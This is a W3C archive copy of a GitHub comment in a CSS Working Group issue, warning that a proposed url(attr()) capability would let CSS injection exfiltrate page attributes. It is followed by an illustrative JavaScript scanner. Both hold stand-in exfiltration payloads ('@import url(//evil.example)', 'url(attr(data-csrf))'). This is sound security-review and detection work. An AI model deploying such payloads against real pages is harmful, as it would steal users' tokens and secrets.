- From: arturjanc via GitHub <sysbot+gh@w3.org>
- Date: Fri, 29 May 2020 13:46:31 +0000
- To: public-css-archive@w3.org
> As there's no ability to concatenate in CSS, these would become a relative URL resulting in a request to the server that supplied the HTML (or, perhaps, the stylesheet, depending on the outcome of #5079). So you couldn't send a request just anywhere.

That's a great illustration of the security issue this feature runs into: currently, browsers (at least Chrome and Firefox) resolve relative URLs based on the location of the stylesheet, not the loading document. So any CSS injection could just use `@import url(//evil.example)` and then in the malicious stylesheet exfiltrate the contents of all attributes on the page via `url(attr(secret))`, which would send requests to `evil.example/<attribute-value>`.

Currently, attackers can still query against the contents of attributes with CSS3 selectors, but that's a single-bit information leak, requiring thousands of requests (and recursively adding new stylesheets to the page) to exfiltrate something like a CSRF token. This makes such attacks more difficult to conduct in practice, and makes them more time-consuming, increasing the chance that a user would navigate away from the page before the attacker can leak the secret.

Giving `attr()` more capabilities as proposed here would allow direct exfiltration of all attribute values on a page with a single injected stylesheet, substantially increasing the security impact of CSS injections.

I don't think disallowing this on certain elements is sufficient, given the large amount of data modern applications have in `data-*` attributes, URLs, and attributes on custom elements. The only safe solution I can think of would be to allowlist attributes such as `data-css-*`; of course existing use of `attr()` in the `content` property could be exempt from that.

--
GitHub Notification of comment by arturjanc
Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/5092#issuecomment-635981234 using your GitHub account
Received on Friday, 29 May 2020 13:46:33 UTC
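An added static check, written here as an illustration and not code from the thread or the CSS WG, that flags the two ingredients the comment describes: a cross-origin `@import`, and `url(attr(...))` in a stylesheet whose origin differs from the document's (relative URLs resolve against the stylesheet, so that origin is where an attribute value would be sent). The stylesheet URLs, document URL and CSS text are constructed samples, and the regexes cover only the simple forms discussed above.

```javascript
// Added example (not from the thread). Regexes are deliberately minimal;
// a production checker would walk a real CSS parse tree instead.
const IMPORT_RE = /@import\s+(?:url\(\s*['"]?([^'")]+?)['"]?\s*\)|['"]([^'"]+)['"])/g;
const URL_ATTR_RE = /url\(\s*attr\(\s*([A-Za-z0-9_-]+)[^)]*\)\s*\)/g;

function scanStylesheet(cssText, stylesheetUrl, documentUrl) {
  const sheetOrigin = new URL(stylesheetUrl).origin;
  const docOrigin = new URL(documentUrl).origin;
  const findings = [];
  for (const m of cssText.matchAll(IMPORT_RE)) {
    // @import targets are resolved relative to the importing stylesheet.
    const target = new URL(m[1] || m[2], stylesheetUrl);
    findings.push({ kind: 'import', target: target.href,
                    crossOrigin: target.origin !== docOrigin });
  }
  for (const m of cssText.matchAll(URL_ATTR_RE)) {
    // Whatever attr() yields becomes a URL relative to the stylesheet's
    // location, so the request goes to the stylesheet's origin.
    findings.push({ kind: 'url(attr())', attr: m[1], resolvesAgainst: sheetOrigin,
                    crossOrigin: sheetOrigin !== docOrigin });
  }
  return findings;
}

// Constructed sample (hypothetical hosts): an injected @import in the site's own
// stylesheet pulls in a third-party sheet, which then builds URLs from attributes.
const DOC_URL = 'https://app.example/account';
const SAMPLES = [
  { url: 'https://app.example/site.css',
    css: '@import url(//evil.example/x.css); body{color:#000}' },
  { url: 'https://evil.example/x.css',
    css: 'input[name=token] { background: url(attr(data-csrf)); }' },
];

function scanSamples() {
  return SAMPLES.flatMap(s => scanStylesheet(s.css, s.url, DOC_URL));
}

console.log(scanSamples());
```

A same-origin stylesheet using `url(attr(...))` is still reported, but with `crossOrigin: false`, which is the case the quoted reply considered harmless.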